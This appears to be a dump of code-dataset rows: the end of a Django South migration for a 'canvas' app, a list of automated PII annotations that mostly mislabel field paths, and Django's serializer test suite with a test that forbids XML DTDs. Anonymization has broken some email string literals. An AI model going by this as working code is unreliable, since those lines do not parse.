'follower_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'free_invites': ('django.db.models.fields.IntegerField', [], {'default': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invite_bypass': ('django.db.models.fields.CharField', [], {'default': ""''"", 'max_length': '255', 'blank': 'True'}),
'is_qa': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'post_anonymously': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'profile_image': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['canvas.Comment']"", 'null': 'True'}),
'trust_changed': ('canvas.util.UnixTimestampField', [], {'null': 'True', 'blank': 'True'}),
'trusted': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': ""orm['auth.User']"", 'unique': 'True'})
},
'canvas.usermoderationlog': {
'Meta': {'object_name': 'UserModerationLog'},
'action': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderator': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'null': 'True'}),
'note': ('django.db.models.fields.TextField', [], {}),
'timestamp': ('canvas.util.UnixTimestampField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'moderation_log'"", 'to': ""orm['auth.User']""})
},
'canvas.userwarning': {
'Meta': {'object_name': 'UserWarning'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': ""orm['canvas.Comment']"", 'null': 'True', 'blank': 'True'}),
'confirmed': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
'custom_message': ('django.db.models.fields.TextField', [], {}),
'disable_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('canvas.util.UnixTimestampField', [], {}),
'stock_message': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': ""'user_warnings'"", 'to': ""orm['auth.User']""}),
'viewed': ('canvas.util.UnixTimestampField', [], {'default': '0'})
},
'canvas.welcomeemailrecipient': {
'Meta': {'object_name': 'WelcomeEmailRecipient'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': ""orm['auth.User']"", 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': ""('name',)"", 'unique_together': ""(('app_label', 'model'),)"", 'object_name': 'ContentType', 'db_table': ""'django_content_type'""},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['canvas']
",21701,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'FloatField'], ['DATE_TIME', ""'2000'""], ['PERSON', 'FloatField'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['PERSON', 'RemixPlugin'], ['DATE_TIME', ""'2000'""], ['PERSON', 'follower_count'], ['PERSON', 'UserWarning'], ['PERSON', 'complete_apps'], ['URL', 'auth.gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'auth.pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'contenttypes.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'auth.us'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Gr'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fi'], ['URL', 'datetime.datetime.no'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Pe'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.be'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'canvas.ca'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.com'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.co'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Ma'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bi'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.fo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Ca'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.in'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.re'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'canvas.st'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fields.Nu'], ['URL', 'django.db.models.fields.re'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'canvas.us'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'canvas.Com'], ['URL', 'django.db.models.fi'], ['URL', 'django.db.models.fields.Bo'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Int'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.related.Fo'], ['URL', 'auth.Us'], ['URL', 'contenttypes.co'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Au'], ['URL', 'django.db.models.fields.Ch'], ['URL', 'django.db.models.fields.Ch']]"
42,"""""""
A test spanning all the capabilities of all the serializers.
This class defines sample data and a dynamically generated
test case that is capable of testing the capabilities of
the serializers. This includes all valid data values, plus
forward, backwards and self references.
""""""
from __future__ import unicode_literals
import datetime
import decimal
from unittest import expectedFailure, skipUnless
try:
import yaml
except ImportError:
yaml = None
from django.core import serializers
from django.core.serializers import SerializerDoesNotExist
from django.core.serializers.base import DeserializationError
from django.core.serializers.xml_serializer import DTDForbidden
from django.db import connection, models
from django.http import HttpResponse
from django.test import TestCase
from django.utils import six
from django.utils.encoding import force_text
from django.utils.functional import curry
from .models import (BinaryData, BooleanData, CharData, DateData, DateTimeData, EmailData,
FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData,
GenericIPAddressData, NullBooleanData, PositiveIntegerData,
PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData,
GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData,
FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData,
Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData,
DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData,
GenericIPAddressPKData, PositiveIntegerPKData,
PositiveSmallIntegerPKData, SlugPKData, SmallPKData,
AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel,
ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel,
ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel,
NaturalKeyAnchor, FKDataNaturalKey)
# A set of functions that can be used to recreate
# test data objects of various kinds.
# The save method is a raw base model save, to make
# sure that the data in the database matches the
# exact test case.
def data_create(pk, klass, data):
instance = klass(id=pk)
instance.data = data
models.Model.save_base(instance, raw=True)
return [instance]
def generic_create(pk, klass, data):
instance = klass(id=pk)
instance.data = data[0]
models.Model.save_base(instance, raw=True)
for tag in data[1:]:
instance.tags.create(data=tag)
return [instance]
def fk_create(pk, klass, data):
instance = klass(id=pk)
setattr(instance, 'data_id', data)
models.Model.save_base(instance, raw=True)
return [instance]
def m2m_create(pk, klass, data):
instance = klass(id=pk)
models.Model.save_base(instance, raw=True)
instance.data = data
return [instance]
def im2m_create(pk, klass, data):
instance = klass(id=pk)
models.Model.save_base(instance, raw=True)
return [instance]
def im_create(pk, klass, data):
instance = klass(id=pk)
instance.right_id = data['right']
instance.left_id = data['left']
if 'extra' in data:
instance.extra = data['extra']
models.Model.save_base(instance, raw=True)
return [instance]
def o2o_create(pk, klass, data):
instance = klass()
instance.data_id = data
models.Model.save_base(instance, raw=True)
return [instance]
def pk_create(pk, klass, data):
instance = klass()
instance.data = data
models.Model.save_base(instance, raw=True)
return [instance]
def inherited_create(pk, klass, data):
instance = klass(id=pk,**data)
# This isn't a raw save because:
# 1) we're testing inheritance, not field behavior, so none
# of the field values need to be protected.
# 2) saving the child class and having the parent created
# automatically is easier than manually creating both.
models.Model.save(instance)
created = [instance]
for klass,field in instance._meta.parents.items():
created.append(klass.objects.get(id=pk))
return created
# A set of functions that can be used to compare
# test data objects of various kinds
def data_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
if klass == BinaryData and data is not None:
testcase.assertEqual(bytes(data), bytes(instance.data),
""Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)"" % (
pk, repr(bytes(data)), type(data), repr(bytes(instance.data)),
type(instance.data))
)
else:
testcase.assertEqual(data, instance.data,
""Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)"" % (
pk, data, type(data), instance, type(instance.data))
)
def generic_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data[0], instance.data)
testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by('id')])
def fk_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data, instance.data_id)
def m2m_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data, [obj.id for obj in instance.data.order_by('id')])
def im2m_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
#actually nothing else to check, the instance just should exist
def im_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
testcase.assertEqual(data['left'], instance.left_id)
testcase.assertEqual(data['right'], instance.right_id)
if 'extra' in data:
testcase.assertEqual(data['extra'], instance.extra)
else:
testcase.assertEqual(""doesn't matter"", instance.extra)
def o2o_compare(testcase, pk, klass, data):
instance = klass.objects.get(data=data)
testcase.assertEqual(data, instance.data_id)
def pk_compare(testcase, pk, klass, data):
instance = klass.objects.get(data=data)
testcase.assertEqual(data, instance.data)
def inherited_compare(testcase, pk, klass, data):
instance = klass.objects.get(id=pk)
for key,value in data.items():
testcase.assertEqual(value, getattr(instance,key))
# Define some data types. Each data type is
# actually a pair of functions; one to create
# and one to compare objects of that type
data_obj = (data_create, data_compare)
generic_obj = (generic_create, generic_compare)
fk_obj = (fk_create, fk_compare)
m2m_obj = (m2m_create, m2m_compare)
im2m_obj = (im2m_create, im2m_compare)
im_obj = (im_create, im_compare)
o2o_obj = (o2o_create, o2o_compare)
pk_obj = (pk_create, pk_compare)
inherited_obj = (inherited_create, inherited_compare)
test_data = [
# Format: (data type, PK value, Model Class, data)
(data_obj, 1, BinaryData, six.memoryview(b""\x05\xFD\x00"")),
(data_obj, 2, BinaryData, None),
(data_obj, 5, BooleanData, True),
(data_obj, 6, BooleanData, False),
(data_obj, 10, CharData, ""Test Char Data""),
(data_obj, 11, CharData, """"),
(data_obj, 12, CharData, ""None""),
(data_obj, 13, CharData, ""null""),
(data_obj, 14, CharData, ""NULL""),
(data_obj, 15, CharData, None),
# (We use something that will fit into a latin1 database encoding here,
# because that is still the default used on many system setups.)
(data_obj, 16, CharData, '\xa5'),
(data_obj, 20, DateData, datetime.date(2006,6,16)),
(data_obj, 21, DateData, None),
(data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)),
(data_obj, 31, DateTimeData, None),
(data_obj, 40, EmailData, dummy@email.com""),
(data_obj, 41, EmailData, None),
(data_obj, 42, EmailData, """"),
(data_obj, 50, FileData, 'file:///foo/bar/whiz.txt'),
# (data_obj, 51, FileData, None),
(data_obj, 52, FileData, """"),
(data_obj, 60, FilePathData, ""/foo/bar/whiz.txt""),
(data_obj, 61, FilePathData, None),
(data_obj, 62, FilePathData, """"),
(data_obj, 70, DecimalData, decimal.Decimal('12.345')),
(data_obj, 71, DecimalData, decimal.Decimal('-12.345')),
(data_obj, 72, DecimalData, decimal.Decimal('0.0')),
(data_obj, 73, DecimalData, None),
(data_obj, 74, FloatData, 12.345),
(data_obj, 75, FloatData, -12.345),
(data_obj, 76, FloatData, 0.0),
(data_obj, 77, FloatData, None),
(data_obj, 80, IntegerData, 123456789),
(data_obj, 81, IntegerData, -123456789),
(data_obj, 82, IntegerData, 0),
(data_obj, 83, IntegerData, None),
#(XX, ImageData
(data_obj, 90, IPAddressData, ""127.0.0.1""),
(data_obj, 91, IPAddressData, None),
(data_obj, 95, GenericIPAddressData, ""127.0.0.1""),
(data_obj, 96, GenericIPAddressData, None),
(data_obj, 100, NullBooleanData, True),
(data_obj, 101, NullBooleanData, False),
(data_obj, 102, NullBooleanData, None),
(data_obj, 120, PositiveIntegerData, 123456789),
(data_obj, 121, PositiveIntegerData, None),
(data_obj, 130, PositiveSmallIntegerData, 12),
(data_obj, 131, PositiveSmallIntegerData, None),
(data_obj, 140, SlugData, ""this-is-a-slug""),
(data_obj, 141, SlugData, None),
(data_obj, 142, SlugData, """"),
(data_obj, 150, SmallData, 12),
(data_obj, 151, SmallData, -12),
(data_obj, 152, SmallData, 0),
(data_obj, 153, SmallData, None),
(data_obj, 160, TextData, """"""This is a long piece of text.
It contains line breaks.
Several of them.
The end.""""""),
(data_obj, 161, TextData, """"),
(data_obj, 162, TextData, None),
(data_obj, 170, TimeData, datetime.time(10,42,37)),
(data_obj, 171, TimeData, None),
(generic_obj, 200, GenericData, ['Generic Object 1', 'tag1', 'tag2']),
(generic_obj, 201, GenericData, ['Generic Object 2', 'tag2', 'tag3']),
(data_obj, 300, Anchor, ""Anchor 1""),
(data_obj, 301, Anchor, ""Anchor 2""),
(data_obj, 302, UniqueAnchor, ""UAnchor 1""),
(fk_obj, 400, FKData, 300), # Post reference
(fk_obj, 401, FKData, 500), # Pre reference
(fk_obj, 402, FKData, None), # Empty reference
(m2m_obj, 410, M2MData, []), # Empty set
(m2m_obj, 411, M2MData, [300,301]), # Post reference
(m2m_obj, 412, M2MData, [500,501]), # Pre reference
(m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference
(o2o_obj, None, O2OData, 300), # Post reference
(o2o_obj, None, O2OData, 500), # Pre reference
(fk_obj, 430, FKSelfData, 431), # Pre reference
(fk_obj, 431, FKSelfData, 430), # Post reference
(fk_obj, 432, FKSelfData, None), # Empty reference
(m2m_obj, 440, M2MSelfData, []),
(m2m_obj, 441, M2MSelfData, []),
(m2m_obj, 442, M2MSelfData, [440, 441]),
(m2m_obj, 443, M2MSelfData, [445, 446]),
(m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]),
(m2m_obj, 445, M2MSelfData, []),
(m2m_obj, 446, M2MSelfData, []),
(fk_obj, 450, FKDataToField, ""UAnchor 1""),
(fk_obj, 451, FKDataToField, ""UAnchor 2""),
(fk_obj, 452, FKDataToField, None),
(fk_obj, 460, FKDataToO2O, 300),
(im2m_obj, 470, M2MIntermediateData, None),
#testing post- and prereferences and extra fields
(im_obj, 480, Intermediate, {'right': 300, 'left': 470}),
(im_obj, 481, Intermediate, {'right': 300, 'left': 490}),
(im_obj, 482, Intermediate, {'right': 500, 'left': 470}),
(im_obj, 483, Intermediate, {'right': 500, 'left': 490}),
(im_obj, 484, Intermediate, {'right': 300, 'left': 470, 'extra': ""extra""}),
(im_obj, 485, Intermediate, {'right': 300, 'left': 490, 'extra': ""extra""}),
(im_obj, 486, Intermediate, {'right': 500, 'left': 470, 'extra': ""extra""}),
(im_obj, 487, Intermediate, {'right': 500, 'left': 490, 'extra': ""extra""}),
(im2m_obj, 490, M2MIntermediateData, []),
(data_obj, 500, Anchor, ""Anchor 3""),
(data_obj, 501, Anchor, ""Anchor 4""),
(data_obj, 502, UniqueAnchor, ""UAnchor 2""),
(pk_obj, 601, BooleanPKData, True),
(pk_obj, 602, BooleanPKData, False),
(pk_obj, 610, CharPKData, ""Test Char PKData""),
# (pk_obj, 620, DatePKData, datetime.date(2006,6,16)),
# (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)),
(pk_obj, 640, EmailPKData, dummy@email.com""),
# (pk_obj, 650, FilePKData, 'file:///foo/bar/whiz.txt'),
(pk_obj, 660, FilePathPKData, ""/foo/bar/whiz.txt""),
(pk_obj, 670, DecimalPKData, decimal.Decimal('12.345')),
(pk_obj, 671, DecimalPKData, decimal.Decimal('-12.345')),
(pk_obj, 672, DecimalPKData, decimal.Decimal('0.0')),
(pk_obj, 673, FloatPKData, 12.345),
(pk_obj, 674, FloatPKData, -12.345),
(pk_obj, 675, FloatPKData, 0.0),
(pk_obj, 680, IntegerPKData, 123456789),
(pk_obj, 681, IntegerPKData, -123456789),
(pk_obj, 682, IntegerPKData, 0),
# (XX, ImagePKData
(pk_obj, 690, IPAddressPKData, ""127.0.0.1""),
(pk_obj, 695, GenericIPAddressPKData, ""127.0.0.1""),
# (pk_obj, 700, NullBooleanPKData, True),
# (pk_obj, 701, NullBooleanPKData, False),
(pk_obj, 720, PositiveIntegerPKData, 123456789),
(pk_obj, 730, PositiveSmallIntegerPKData, 12),
(pk_obj, 740, SlugPKData, ""this-is-a-slug""),
(pk_obj, 750, SmallPKData, 12),
(pk_obj, 751, SmallPKData, -12),
(pk_obj, 752, SmallPKData, 0),
# (pk_obj, 760, TextPKData, """"""This is a long piece of text.
# It contains line breaks.
# Several of them.
# The end.""""""),
# (pk_obj, 770, TimePKData, datetime.time(10,42,37)),
# (pk_obj, 790, XMLPKData, "" ""),
(data_obj, 800, AutoNowDateTimeData, datetime.datetime(2006,6,16,10,42,37)),
(data_obj, 810, ModifyingSaveData, 42),
(inherited_obj, 900, InheritAbstractModel, {'child_data':37,'parent_data':42}),
(inherited_obj, 910, ExplicitInheritBaseModel, {'child_data':37,'parent_data':42}),
(inherited_obj, 920, InheritBaseModel, {'child_data':37,'parent_data':42}),
(data_obj, 1000, BigIntegerData, 9223372036854775807),
(data_obj, 1001, BigIntegerData, -9223372036854775808),
(data_obj, 1002, BigIntegerData, 0),
(data_obj, 1003, BigIntegerData, None),
(data_obj, 1004, LengthModel, 0),
(data_obj, 1005, LengthModel, 1),
]
natural_key_test_data = [
(data_obj, 1100, NaturalKeyAnchor, ""Natural Key Anghor""),
(fk_obj, 1101, FKDataNaturalKey, 1100),
(fk_obj, 1102, FKDataNaturalKey, None),
]
# Because Oracle treats the empty string as NULL, Oracle is expected to fail
# when field.empty_strings_allowed is True and the value is None; skip these
# tests.
if connection.features.interprets_empty_strings_as_nulls:
test_data = [data for data in test_data
if not (data[0] == data_obj and
data[2]._meta.get_field('data').empty_strings_allowed and
data[3] is None)]
# Regression test for #8651 -- a FK to an object iwth PK of 0
# This won't work on MySQL since it won't let you create an object
# with a primary key of 0,
if connection.features.allows_primary_key_0:
test_data.extend([
(data_obj, 0, Anchor, ""Anchor 0""),
(fk_obj, 465, FKData, 0),
])
# Dynamically create serializer tests to ensure that all
# registered serializers are automatically tested.
class SerializerTests(TestCase):
def test_get_unknown_serializer(self):
""""""
#15889: get_serializer('nonsense') raises a SerializerDoesNotExist
""""""
with self.assertRaises(SerializerDoesNotExist):
serializers.get_serializer(""nonsense"")
with self.assertRaises(KeyError):
serializers.get_serializer(""nonsense"")
# SerializerDoesNotExist is instantiated with the nonexistent format
with self.assertRaises(SerializerDoesNotExist) as cm:
serializers.get_serializer(""nonsense"")
self.assertEqual(cm.exception.args, (""nonsense"",))
def test_unregister_unkown_serializer(self):
with self.assertRaises(SerializerDoesNotExist):
serializers.unregister_serializer(""nonsense"")
def test_get_unkown_deserializer(self):
with self.assertRaises(SerializerDoesNotExist):
serializers.get_deserializer(""nonsense"")
def test_json_deserializer_exception(self):
with self.assertRaises(DeserializationError):
for obj in serializers.deserialize(""json"", """"""[{""pk"":1}""""""):
pass
@skipUnless(yaml, ""PyYAML not installed"")
def test_yaml_deserializer_exception(self):
with self.assertRaises(DeserializationError):
for obj in serializers.deserialize(""yaml"", ""{""):
pass
def test_serialize_proxy_model(self):
BaseModel.objects.create(parent_data=1)
base_objects = BaseModel.objects.all()
proxy_objects = ProxyBaseModel.objects.all()
proxy_proxy_objects = ProxyProxyBaseModel.objects.all()
base_data = serializers.serialize(""json"", base_objects)
proxy_data = serializers.serialize(""json"", proxy_objects)
proxy_proxy_data = serializers.serialize(""json"", proxy_proxy_objects)
self.assertEqual(base_data, proxy_data.replace('proxy', ''))
self.assertEqual(base_data, proxy_proxy_data.replace('proxy', ''))
def serializerTest(format, self):
# Create all the objects defined in the test data
objects = []
instance_count = {}
for (func, pk, klass, datum) in test_data:
with connection.constraint_checks_disabled():
objects.extend(func[0](pk, klass, datum))
# Get a count of the number of objects created for each class
for klass in instance_count:
instance_count[klass] = klass.objects.count()
# Add the generic tagged objects to the object list
objects.extend(Tag.objects.all())
# Serialize the test database
serialized_data = serializers.serialize(format, objects, indent=2)
for obj in serializers.deserialize(format, serialized_data):
obj.save()
# Assert that the deserialized data is the same
# as the original source
for (func, pk, klass, datum) in test_data:
func[1](self, pk, klass, datum)
# Assert that the number of objects deserialized is the
# same as the number that was serialized.
for klass, count in instance_count.items():
self.assertEqual(count, klass.objects.count())
if connection.vendor == 'mysql' and six.PY3:
# Existing MySQL DB-API drivers fail on binary data.
serializerTest = expectedFailure(serializerTest)
def naturalKeySerializerTest(format, self):
# Create all the objects defined in the test data
objects = []
instance_count = {}
for (func, pk, klass, datum) in natural_key_test_data:
with connection.constraint_checks_disabled():
objects.extend(func[0](pk, klass, datum))
# Get a count of the number of objects created for each class
for klass in instance_count:
instance_count[klass] = klass.objects.count()
# Serialize the test database
serialized_data = serializers.serialize(format, objects, indent=2,
use_natural_keys=True)
for obj in serializers.deserialize(format, serialized_data):
obj.save()
# Assert that the deserialized data is the same
# as the original source
for (func, pk, klass, datum) in natural_key_test_data:
func[1](self, pk, klass, datum)
# Assert that the number of objects deserialized is the
# same as the number that was serialized.
for klass, count in instance_count.items():
self.assertEqual(count, klass.objects.count())
def fieldsTest(format, self):
obj = ComplexModel(field1='first', field2='second', field3='third')
obj.save_base(raw=True)
# Serialize then deserialize the test database
serialized_data = serializers.serialize(format, [obj], indent=2, fields=('field1','field3'))
result = next(serializers.deserialize(format, serialized_data))
# Check that the deserialized object contains data in only the serialized fields.
self.assertEqual(result.object.field1, 'first')
self.assertEqual(result.object.field2, '')
self.assertEqual(result.object.field3, 'third')
def streamTest(format, self):
obj = ComplexModel(field1='first',field2='second',field3='third')
obj.save_base(raw=True)
# Serialize the test database to a stream
for stream in (six.StringIO(), HttpResponse()):
serializers.serialize(format, [obj], indent=2, stream=stream)
# Serialize normally for a comparison
string_data = serializers.serialize(format, [obj], indent=2)
# Check that the two are the same
if isinstance(stream, six.StringIO):
self.assertEqual(string_data, stream.getvalue())
else:
self.assertEqual(string_data, stream.content.decode('utf-8'))
for format in serializers.get_serializer_formats():
setattr(SerializerTests, 'test_' + format + '_serializer', curry(serializerTest, format))
setattr(SerializerTests, 'test_' + format + '_natural_key_serializer', curry(naturalKeySerializerTest, format))
setattr(SerializerTests, 'test_' + format + '_serializer_fields', curry(fieldsTest, format))
if format != 'python':
setattr(SerializerTests, 'test_' + format + '_serializer_stream', curry(streamTest, format))
class XmlDeserializerSecurityTests(TestCase):
def test_no_dtd(self):
""""""
The XML deserializer shouldn't allow a DTD.
This is the most straightforward way to prevent all entity definitions
and avoid both external entities and entity-expansion attacks.
""""""
xml = ''
with self.assertRaises(DTDForbidden):
next(serializers.deserialize('xml', xml))
